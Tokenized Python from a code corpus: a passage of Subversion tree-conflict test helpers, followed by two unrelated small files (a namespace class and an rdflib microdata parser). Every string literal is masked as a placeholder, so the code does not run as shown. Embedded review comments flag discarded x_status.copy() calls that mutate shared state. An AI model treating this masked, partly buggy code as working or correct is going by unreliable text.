'<STR_LIT>' : Item ( "<STR_LIT>" ) , <EOL> } ) <EOL>
# Local action: schedule all six leaf items for deletion. <EOL>
def deep_trees_leaf_del ( base ) : <EOL> """<STR_LIT>""" <EOL> j = os . path . join <EOL> F = j ( base , '<STR_LIT:F>' , '<STR_LIT>' ) <EOL> D = j ( base , '<STR_LIT:D>' , '<STR_LIT>' ) <EOL> DF = j ( base , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DD = j ( base , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DDF = j ( base , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DDD = j ( base , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> main . run_svn ( None , '<STR_LIT>' , F , D , DF , DD , DDF , DDD ) <EOL> deep_trees_after_leaf_del = wc . State ( '<STR_LIT>' , { <EOL> '<STR_LIT:F>' : Item ( ) , <EOL> '<STR_LIT:D>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> } ) <EOL>
# Pre-commit leaf-del expectation differs between single-DB and old-style working copies. <EOL>
def deep_trees_after_leaf_del_no_ci ( wc_dir ) : <EOL> if svntest . main . wc_is_singledb ( wc_dir ) : <EOL> return deep_trees_after_leaf_del <EOL> else : <EOL> return deep_trees_empty_dirs <EOL>
# Local action: schedule the six top child items for deletion (whole subtrees). <EOL>
def deep_trees_tree_del ( base ) : <EOL> """<STR_LIT>""" <EOL> j = os . path . join <EOL> F = j ( base , '<STR_LIT:F>' , '<STR_LIT>' ) <EOL> D = j ( base , '<STR_LIT:D>' , '<STR_LIT>' ) <EOL> DF = j ( base , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DD = j ( base , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DDF = j ( base , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DDD = j ( base , '<STR_LIT>' , '<STR_LIT>' ) <EOL> main . run_svn ( None , '<STR_LIT>' , F , D , DF , DD , DDF , DDD ) <EOL>
# Local action: obliterate the same items directly on disk (unversioned removal) -- note F's child is a file (unlink), the rest are directories. <EOL>
def deep_trees_rmtree ( base ) : <EOL> """<STR_LIT>""" <EOL> j = os . path . join <EOL> F = j ( base , '<STR_LIT:F>' , '<STR_LIT>' ) <EOL> D = j ( base , '<STR_LIT:D>' , '<STR_LIT>' ) <EOL> DF = j ( base , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DD = j ( base , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DDF = j ( base , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DDD = j ( base , '<STR_LIT>' , '<STR_LIT>' ) <EOL> os . unlink ( F ) <EOL> main . safe_rmtree ( D ) <EOL> main . safe_rmtree ( DF ) <EOL> main . safe_rmtree ( DD ) <EOL> main . safe_rmtree ( DDF ) <EOL> main . safe_rmtree ( DDD ) <EOL> deep_trees_after_tree_del = wc . State ( '<STR_LIT>' , { <EOL> '<STR_LIT:F>' : Item ( ) , <EOL> '<STR_LIT:D>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> } ) <EOL> deep_trees_empty_dirs = wc . State ( '<STR_LIT>' , { <EOL> '<STR_LIT:F>' : Item ( ) , <EOL> '<STR_LIT:D>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> } ) <EOL>
# Pre-commit tree-del expectation, again dependent on the wc DB format. <EOL>
def deep_trees_after_tree_del_no_ci ( wc_dir ) : <EOL> if svntest . main . wc_is_singledb ( wc_dir ) : <EOL> return deep_trees_after_tree_del <EOL> else : <EOL> return deep_trees_empty_dirs <EOL>
# Incoming action performed directly in the repository (URL-side delete of the six subtrees in one commit). <EOL>
def deep_trees_tree_del_repos ( base ) : <EOL> """<STR_LIT>""" <EOL> j = '<STR_LIT:/>' . join <EOL> F = j ( [ base , '<STR_LIT:F>' , '<STR_LIT>' ] ) <EOL> D = j ( [ base , '<STR_LIT:D>' , '<STR_LIT>' ] ) <EOL> DF = j ( [ base , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> DD = j ( [ base , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> DDF = j ( [ base , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> DDD = j ( [ base , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> main . run_svn ( None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , F , D , DF , DD , DDF , DDD ) <EOL>
# Canned expected-output / expected-status states for the tree-conflict scenarios ('C' = tree conflict markers on the six contested paths). <EOL>
deep_trees_conflict_output = wc . State ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , treeconflict = '<STR_LIT:C>' ) , <EOL> } ) <EOL> deep_trees_conflict_output_skipped = wc . State ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : Item ( verb = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : Item ( verb = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : Item ( verb = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : Item ( verb = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : Item ( verb = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : Item ( verb = '<STR_LIT>' ) , <EOL> } ) <EOL> deep_trees_status_local_tree_del = wc . State ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT:D>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT:F>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> } ) <EOL> deep_trees_status_local_leaf_edit = wc . State ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT:D>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT:F>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> } ) <EOL>
# Plain data holder describing one deep-trees scenario: a local action, an incoming action, and the expected output/disk/status/skip/info plus error and commit-block expectations. <EOL>
class DeepTreesTestCase : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , local_action , incoming_action , <EOL> expected_output = None , expected_disk = None , <EOL> expected_status = None , expected_skip = None , <EOL> error_re_string = None , <EOL> commit_block_string = "<STR_LIT>" , <EOL> expected_info = None ) : <EOL> self . name = name <EOL> self . local_action = local_action <EOL> self . incoming_action = incoming_action <EOL> self . expected_output = expected_output <EOL> self . expected_disk = expected_disk <EOL> self . expected_status = expected_status <EOL> self . expected_skip = expected_skip <EOL> self . error_re_string = error_re_string <EOL> self . commit_block_string = commit_block_string <EOL> self . expected_info = expected_info <EOL>
# Driver: for each test case, add the fixture, commit, apply the incoming action, commit, update the whole wc back, apply the local action, then update each case's subtree and verify output/status/info, and finally verify the commit is blocked as expected. <EOL>
def deep_trees_run_tests_scheme_for_update ( sbox , greater_scheme ) : <EOL> """<STR_LIT>""" <EOL> j = os . path . join <EOL> if not sbox . is_built ( ) : <EOL> sbox . build ( ) <EOL> wc_dir = sbox . wc_dir <EOL> for test_case in greater_scheme : <EOL> try : <EOL> add_deep_trees ( sbox , test_case . name ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> main . run_svn ( None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , wc_dir ) <EOL> for test_case in greater_scheme : <EOL> try : <EOL> test_case . incoming_action ( j ( sbox . wc_dir , test_case . name ) ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> main . run_svn ( None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , wc_dir ) <EOL> main . run_svn ( None , '<STR_LIT>' , '<STR_LIT>' , wc_dir ) <EOL> for test_case in greater_scheme : <EOL> try : <EOL> test_case . local_action ( j ( wc_dir , test_case . name ) ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> for test_case in greater_scheme : <EOL> try : <EOL> base = j ( wc_dir , test_case . name ) <EOL> x_out = test_case . expected_output <EOL> if x_out != None : <EOL> x_out = x_out . copy ( ) <EOL> x_out . wc_dir = base <EOL> x_disk = test_case . expected_disk <EOL> x_status = test_case . expected_status <EOL> if x_status != None : <EOL>
# NOTE(review): result of x_status.copy() is discarded (contrast x_out above, and deep_trees_skipping_on_update below which assigns it) -- the shared expected_status object's wc_dir is mutated in place. Same pattern recurs in the commit loop below and in the switch/merge drivers. <EOL>
x_status . copy ( ) <EOL> x_status . wc_dir = base <EOL> run_and_verify_update ( base , x_out , x_disk , None , <EOL> error_re_string = test_case . error_re_string ) <EOL> if x_status : <EOL> run_and_verify_unquiet_status ( base , x_status ) <EOL> x_info = test_case . expected_info or { } <EOL> for path in x_info : <EOL> run_and_verify_info ( [ x_info [ path ] ] , j ( base , path ) ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> for test_case in greater_scheme : <EOL> try : <EOL> base = j ( wc_dir , test_case . name ) <EOL> x_status = test_case . expected_status <EOL> if x_status != None : <EOL> x_status . copy ( ) <EOL> x_status . wc_dir = base <EOL> run_and_verify_commit ( base , None , x_status , <EOL> test_case . commit_block_string , <EOL> base ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL>
# Variant driver: after the basic setup, delete the subtrees in the repository and verify that updates of the conflicted paths are skipped (top-level, per-path, and after chdir), and that commits stay blocked. <EOL>
def deep_trees_skipping_on_update ( sbox , test_case , skip_paths , <EOL> chdir_skip_paths ) : <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> further_action = deep_trees_tree_del_repos <EOL> j = os . path . join <EOL> wc_dir = sbox . wc_dir <EOL> base = j ( wc_dir , test_case . name ) <EOL> setup_case = DeepTreesTestCase ( test_case . name , <EOL> test_case . local_action , <EOL> test_case . incoming_action , <EOL> None , <EOL> None , <EOL> None ) <EOL> deep_trees_run_tests_scheme_for_update ( sbox , [ setup_case ] ) <EOL> further_action ( sbox . repo_url + '<STR_LIT:/>' + test_case . name ) <EOL> x_out = test_case . expected_output <EOL> if x_out != None : <EOL> x_out = x_out . copy ( ) <EOL> x_out . wc_dir = base <EOL> x_disk = test_case . expected_disk <EOL> x_status = test_case . expected_status <EOL> if x_status != None : <EOL> x_status = x_status . copy ( ) <EOL> x_status . wc_dir = base <EOL> x_status . tweak ( '<STR_LIT>' , '<STR_LIT:D>' , '<STR_LIT:F>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , wc_rev = <NUM_LIT:4> ) <EOL> run_and_verify_update ( base , x_out , x_disk , None , <EOL> error_re_string = test_case . error_re_string ) <EOL> run_and_verify_unquiet_status ( base , x_status ) <EOL> for path in skip_paths : <EOL> run_and_verify_update ( j ( base , path ) , <EOL> wc . State ( base , { path : Item ( verb = '<STR_LIT>' ) } ) , <EOL> None , None ) <EOL> run_and_verify_unquiet_status ( base , x_status ) <EOL> was_cwd = os . getcwd ( ) <EOL>
# NOTE(review): nothing in this loop actually changes directory before os.chdir(was_cwd) -- presumably run_and_verify_update does, or the chdir is vestigial; confirm before touching. <EOL>
for path , skipped in chdir_skip_paths : <EOL> if isinstance ( skipped , list ) : <EOL> expected_skip = { } <EOL> for p in skipped : <EOL> expected_skip [ p ] = Item ( verb = '<STR_LIT>' ) <EOL> else : <EOL> expected_skip = { skipped : Item ( verb = '<STR_LIT>' ) } <EOL> p = j ( base , path ) <EOL> run_and_verify_update ( p , <EOL> wc . State ( p , expected_skip ) , <EOL> None , None ) <EOL> os . chdir ( was_cwd ) <EOL> run_and_verify_unquiet_status ( base , x_status ) <EOL> for path , skipped in chdir_skip_paths : <EOL> run_and_verify_commit ( j ( base , path ) , None , None , <EOL> test_case . commit_block_string , <EOL> base ) <EOL> run_and_verify_unquiet_status ( base , x_status ) <EOL>
# Same scheme as the update driver but exercised through 'svn switch': each case gets two fixture copies, the incoming action lands in one, the local action in the other, then the local copy is switched to the incoming URL. <EOL>
def deep_trees_run_tests_scheme_for_switch ( sbox , greater_scheme ) : <EOL> """<STR_LIT>""" <EOL> j = os . path . join <EOL> if not sbox . is_built ( ) : <EOL> sbox . build ( ) <EOL> wc_dir = sbox . wc_dir <EOL> for test_case in greater_scheme : <EOL> try : <EOL> base = j ( sbox . wc_dir , test_case . name ) <EOL> os . makedirs ( base ) <EOL> make_deep_trees ( j ( base , "<STR_LIT>" ) ) <EOL> make_deep_trees ( j ( base , "<STR_LIT>" ) ) <EOL> main . run_svn ( None , '<STR_LIT>' , base ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> main . run_svn ( None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , wc_dir ) <EOL> for test_case in greater_scheme : <EOL> try : <EOL> test_case . incoming_action ( j ( sbox . wc_dir , test_case . name , "<STR_LIT>" ) ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> main . run_svn ( None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , wc_dir ) <EOL> for test_case in greater_scheme : <EOL> try : <EOL> test_case . local_action ( j ( sbox . wc_dir , test_case . name , "<STR_LIT>" ) ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> for test_case in greater_scheme : <EOL> try : <EOL> local = j ( wc_dir , test_case . name , "<STR_LIT>" ) <EOL> incoming = sbox . repo_url + "<STR_LIT:/>" + test_case . name + "<STR_LIT>" <EOL> x_out = test_case . expected_output <EOL> if x_out != None : <EOL> x_out = x_out . copy ( ) <EOL> x_out . wc_dir = local <EOL> x_disk = test_case . expected_disk <EOL> x_status = test_case . expected_status <EOL> if x_status != None : <EOL>
# NOTE(review): same discarded x_status.copy() as in the update driver. <EOL>
x_status . copy ( ) <EOL> x_status . wc_dir = local <EOL> run_and_verify_switch ( local , local , incoming , x_out , x_disk , None , <EOL> test_case . error_re_string , None , None , None , <EOL> None , False , '<STR_LIT>' ) <EOL> run_and_verify_unquiet_status ( local , x_status ) <EOL> x_info = test_case . expected_info or { } <EOL> for path in x_info : <EOL> run_and_verify_info ( [ x_info [ path ] ] , j ( local , path ) ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> for test_case in greater_scheme : <EOL> try : <EOL> local = j ( wc_dir , test_case . name , '<STR_LIT>' ) <EOL> x_status = test_case . expected_status <EOL> if x_status != None : <EOL> x_status . copy ( ) <EOL> x_status . wc_dir = local <EOL> run_and_verify_commit ( local , None , x_status , <EOL> test_case . commit_block_string , <EOL> local ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL>
# Merge variant: the incoming side is copied server-side, actions are applied to the two copies (local changes optionally committed first), then the incoming branch is merged into the local copy (optionally with ignore-ancestry) and conflicts optionally committed. <EOL>
def deep_trees_run_tests_scheme_for_merge ( sbox , greater_scheme , <EOL> do_commit_local_changes , <EOL> do_commit_conflicts = True , <EOL> ignore_ancestry = False ) : <EOL> """<STR_LIT>""" <EOL> j = os . path . join <EOL> if not sbox . is_built ( ) : <EOL> sbox . build ( ) <EOL> wc_dir = sbox . wc_dir <EOL> for test_case in greater_scheme : <EOL> try : <EOL> base = j ( sbox . wc_dir , test_case . name ) <EOL> os . makedirs ( base ) <EOL> make_deep_trees ( j ( base , "<STR_LIT>" ) ) <EOL> main . run_svn ( None , '<STR_LIT>' , base ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> main . run_svn ( None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , wc_dir ) <EOL> for test_case in greater_scheme : <EOL> try : <EOL> base_url = sbox . repo_url + "<STR_LIT:/>" + test_case . name <EOL> incoming_url = base_url + "<STR_LIT>" <EOL> local_url = base_url + "<STR_LIT>" <EOL> main . run_svn ( None , '<STR_LIT>' , incoming_url , local_url , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> try : <EOL> main . run_svn ( None , '<STR_LIT>' , sbox . wc_dir ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" ) <EOL> raise <EOL> for test_case in greater_scheme : <EOL> try : <EOL> test_case . incoming_action ( j ( sbox . wc_dir , test_case . name , "<STR_LIT>" ) ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> if not do_commit_local_changes : <EOL> try : <EOL> main . run_svn ( None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> sbox . wc_dir ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" ) <EOL> raise <EOL> for test_case in greater_scheme : <EOL> try : <EOL> test_case . local_action ( j ( sbox . wc_dir , test_case . name , "<STR_LIT>" ) ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> if do_commit_local_changes : <EOL> try : <EOL> main . run_svn ( None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> sbox . wc_dir ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" ) <EOL> raise <EOL> for test_case in greater_scheme : <EOL> try : <EOL> local = j ( sbox . wc_dir , test_case . name , "<STR_LIT>" ) <EOL> incoming = sbox . repo_url + "<STR_LIT:/>" + test_case . name + "<STR_LIT>" <EOL> x_out = test_case . expected_output <EOL> if x_out != None : <EOL> x_out = x_out . copy ( ) <EOL> x_out . wc_dir = local <EOL> x_disk = test_case . expected_disk <EOL> x_status = test_case . expected_status <EOL> if x_status != None : <EOL>
# NOTE(review): discarded x_status.copy() / x_skip.copy() results here too. <EOL>
x_status . copy ( ) <EOL> x_status . wc_dir = local <EOL> x_skip = test_case . expected_skip <EOL> if x_skip != None : <EOL> x_skip . copy ( ) <EOL> x_skip . wc_dir = local <EOL> varargs = ( local , ) <EOL> if ignore_ancestry : <EOL> varargs = varargs + ( '<STR_LIT>' , ) <EOL> run_and_verify_merge ( local , None , None , incoming , None , <EOL> x_out , None , None , x_disk , None , x_skip , <EOL> test_case . error_re_string , <EOL> None , None , None , None , <EOL> False , False , * varargs ) <EOL> run_and_verify_unquiet_status ( local , x_status ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> if do_commit_conflicts : <EOL> for test_case in greater_scheme : <EOL> try : <EOL> local = j ( wc_dir , test_case . name , '<STR_LIT>' ) <EOL> x_status = test_case . expected_status <EOL> if x_status != None : <EOL> x_status . copy ( ) <EOL> x_status . wc_dir = local <EOL> run_and_verify_commit ( local , None , x_status , <EOL> test_case . commit_block_string , <EOL> local ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise
<s> '''<STR_LIT>''' <EOL> class PNwkNamespace ( object ) : <EOL> NAMESPACE_SEP = '<STR_LIT:$>' <EOL> def __init__ ( self , name = None ) : <EOL> if not name : name = '<STR_LIT>' <EOL> self . name = name <EOL> sep = self . NAMESPACE_SEP <EOL> self . client_name_space = self . make_namespace ( name ) <EOL> self . pnwkNameSpace = self . make_namespace ( name + '<STR_LIT>' ) <EOL> self . match_namespace = self . make_namespace ( '<STR_LIT>' ) <EOL> def make_namespace ( self , name ) : <EOL> return name + self . NAMESPACE_SEP <EOL> def add_namespace ( self , props , nameSpace ) : <EOL> if not props : return { } <EOL> out = { } <EOL> for key in props . keys ( ) : <EOL> out [ nameSpace + key ] = props [ key ] <EOL> return out <EOL> def split_off_namespace ( self , name ) : <EOL> i = name . find ( self . NAMESPACE_SEP ) + <NUM_LIT:1> <EOL> return ( name [ : i ] , name [ i : ] ) <EOL> def test_add_namespace ( nsp ) : <EOL> a = { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:name>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:3> } <EOL> ns = nsp . make_namespace ( '<STR_LIT>' ) <EOL> b = nsp . add_namespace ( a , ns ) <EOL> assert b [ '<STR_LIT>' + nsp . NAMESPACE_SEP + '<STR_LIT:name>' ] == <NUM_LIT:2> <EOL> def test_split_off_namespace ( nsp ) : <EOL> ( ns , base ) = nsp . split_off_namespace ( '<STR_LIT>' ) <EOL> assert ns == '<STR_LIT>' <EOL> assert base == '<STR_LIT:bar>' <EOL> ( ns , base ) = nsp . split_off_namespace ( '<STR_LIT:bar>' ) <EOL> assert ns == '<STR_LIT>' <EOL> assert base == '<STR_LIT:bar>' <EOL> ( ns , base ) = nsp . split_off_namespace ( '<STR_LIT>' ) <EOL> assert ns == '<STR_LIT>' <EOL> assert base == '<STR_LIT>' <EOL> def test ( ) : <EOL> nsp = PNwkNamespace ( name = '<STR_LIT>' ) <EOL> test_add_namespace ( nsp ) <EOL> test_split_off_namespace ( nsp ) <EOL> print '<STR_LIT>' <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> test ( ) </s>
<s> """<STR_LIT>""" <EOL> import microdata <EOL> from rdflib import URIRef , Literal , BNode , Namespace , RDF <EOL> from rdflib . plugin import register <EOL> from rdflib . parser import Parser <EOL> register ( "<STR_LIT>" , Parser , "<STR_LIT>" , "<STR_LIT>" ) <EOL> class MicrodataParser ( Parser ) : <EOL> def parse ( self , source , sink , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> for item in microdata . get_items ( source . getByteStream ( ) ) : <EOL> self . _add_item ( item , sink ) <EOL> def _add_item ( self , item , sink ) : <EOL> if item . itemid : <EOL> s = URIRef ( item . itemid . string ) <EOL> else : <EOL> s = BNode ( ) <EOL> if not item . itemtype : <EOL> return <EOL> ns = str ( item . itemtype ) <EOL> if ns . endswith ( "<STR_LIT:#>" ) or ns . endswith ( "<STR_LIT:/>" ) : <EOL> ns = Namespace ( item . itemtype ) <EOL> else : <EOL> ns = Namespace ( ns + "<STR_LIT:#>" ) <EOL> sink . add ( ( s , RDF . type , URIRef ( item . itemtype ) ) ) <EOL> for item_property , item_values in item . props . items ( ) : <EOL> p = ns [ item_property ] <EOL> for v in item_values : <EOL> if isinstance ( v , microdata . Item ) : <EOL> o = self . _add_item ( v , sink ) <EOL> elif isinstance ( v , microdata . URI ) : <EOL> o = URIRef ( str ( v ) ) <EOL> else : <EOL> o = Literal ( v ) <EOL> sink . add ( ( s , p , o ) ) <EOL> return s </s>
